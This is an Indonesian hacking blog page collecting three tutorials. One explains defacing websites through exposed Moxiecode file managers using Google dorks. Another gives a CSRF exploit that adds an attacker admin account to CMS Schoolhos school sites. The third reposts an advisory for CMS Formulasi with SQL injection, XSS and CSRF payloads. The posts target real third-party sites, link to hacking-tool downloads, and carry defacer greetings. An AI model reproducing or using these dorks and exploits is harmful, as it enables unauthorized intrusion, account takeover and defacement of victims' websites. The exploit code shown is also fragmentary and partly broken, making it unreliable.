Abdur Rozak: CSRF

Tampilkan postingan dengan label CSRF. Tampilkan semua postingan

Deface Website Metode Moxiecode File Browser | File Upload Vulnerability

Dork Google :

intitle : Moxiecode File browser filetype:php
inurl : filemanager/frameset.php

Langkah Moxiecode File Browser

1. Copy dan search Dork yang sudah saya sediakan, silahkan kembangkan biar nemu yang verawan.

2. Pilih salah satu target, dan jika muncul seperti dibawah ini, maka ada kemungkinan website tersebut Vuln dengan Metode ini, tp belom tentu bisa untuk upload file.

Deface Website Metode Moxiecode File Browser | File Upload Vulnerability

3. Jika berhasil upload, nnti akan ada file anda misal. def.html, tinggal buka saja. Klik Open/View

Contoh Link :

http://www.target.com/tinymce/jscripts/tiny_mce/plugins/filemanager/frameset.php

Semoga bermanfaat.

Sumber : http://www.tkjcyberart.org

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

>> Fuck You ! ------------------------ // ~ root@Jack : ~ \\------------------------ Fuck You ! <<

Download Kumpulan Tools Hacking 100% Work

[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook ** Faris Ghaisan Rabbani >> Twitter ** @JackTersakiti

>> Instagram ** /abdur.rozak.mw >> Youtube ** Pringsewu Cyber Team

// Why So Serious...

Exploit CMS Schoolhos 2017 | CSRF Vulnerability

Selamat datang di blog maniak wifi, kali ini kita belajar CSRF kembali, yaitu CSRF CMS Schoolhos dengan mudah, karena kita menggunakan bantuan Dork.

Exploit CMS Schoolhos 2017 | CSRF Vulnerability

=================

Dork Schoolhos

=================

Google Dork:

inurl:/?p=bukutamu
intext:Schoolhos Free Open Source CMS

==========================

CSRF CMS Schoolhos

==========================

<?php

$self = $_SERVER["PHP_SELF"];

echo 'Target';

echo "<form action=\"$self\" method=\"GET\"><input type=\"text\" name=\"url\"><input type=\"submit\"></form>";

if(!isset($_GET['url'])){

$url = "http://target.com/adminpanel/database/admin.php";

}else

{

$url = $_GET['url'];

}

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<html>

<head>

<title>!!Barrabravaz Everywhere!!</title>

</head>

<body>

<h1>!!Barrabravaz Everywhere!!</h1>

<?php echo "Target is : $url"; ?>

<form id="target" method="post" action="<?php echo "$url"; ?>/adminpanel/aplikasi/database/admin.php?pilih=admin&untukdi=tambah">

Isi username yang mau di isi <INPUT type="text" name="username" value="barrabravaz"><br>

Pass nya<INPUT type="text" name="password" value="barrabravaz"><br>

</form>

</body>

</html>

========================================

Jangan dirubah-rubah iya,, hargai yang buat tools :D

========================================

Semoga Bermanfaat :D

Sumber : http://alamshahcyber.blogspot.co.id/2014/07/tutorial-hack-situs-sekolah-cms_9.html

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

>> Fuck You ! ------------------------ // ~ root@Jack : ~ \\------------------------ Fuck You ! <<

Download Kumpulan Tools Hacking 100% Work

[ DOWNLOAD ] - [ DOWNLOAD ]

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook ** Faris Ghaisan Rabbani >> Twitter ** @JackTersakiti

>> Instagram ** /abdur.rozak.mw >> Youtube ** Pringsewu Cyber Team

// Why So Serious...

Exploit CMS Formulasi 2017 | CSRF Vulnerability

Selamat siang para penduduk internet, terima kasih sudah berkunjung ke blog sederhana ini, semoga bermanfaat, kali ini kita akan belajar exploit cms formulasi dengan menggunakan CSRF yang ada dibawah ini, semoga succes :D

Exploit CMS Formulasi 2017 | CSRF Vulnerability

========================

SQL Injection

========================

Found on

http://localhost/formulasi/kelas-siswa.html

parameter : kelas

post data : kelas=1{SQL_HERE}

========================

XSS Vulnerability

========================

Found On

parameter : tgl

http://localhost/cmsformulasi/index.php?p=tglberita&tgl=<script>alert(123)</script>

========================

CSRF Vulnerability

========================

---------------------BOF--------------------------------------------------

<html>

<head>

<title>Formulasi CRSFT Exploit</title>

</head>

var pauses = new Array( "489","36","27" );

function pausecomp(millis)

{

var date = new Date();

var curDate = null;

do { curDate = new Date(); }

while(curDate-date < millis);

}

function fireForms()

{

var count = 3;

var i=0;

for(i=0; i<count; i++)

{

document.forms[i].submit();

pausecomp(pauses[i]);

}

</script>

<H2>Formulasi CSRF Exploit</H2>

</form>

</body>

</html>

---------------------EOF--------------------------------------------------

========================

Solution :

========================

No Update Until This Advisory published

========================

Timeline:

========================

2013-09-27 Provided details vulnerability to vendor

2013-10-01 Second NotificaTon Vendor

2013-10-04 No Response From Vendor

Sumber : https://www.exploit-db.com/

Terima kasih sudah berkunjung ke Blog ini semoga bermanfaat.

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

>> Fuck You ! ------------------------ // ~ root@Jack : ~ \\------------------------ Fuck You ! <<

Deface Website Metode Moxiecode File Browser | File Upload Vulnerability

Deface Website Metode Moxiecode File Browser | File Upload Vulnerability

Dork Google :

Langkah Moxiecode File Browser

Contoh Link :

Exploit CMS Schoolhos 2017 | CSRF Vulnerability

Exploit CMS Schoolhos 2017 | CSRF Vulnerability

Exploit CMS Formulasi 2017 | CSRF Vulnerability

Exploit CMS Formulasi 2017 | CSRF Vulnerability

Featured Post

Kumpulan Judul Laporan PKL Jurusan TKJ Terbaru

Popular Posts

Category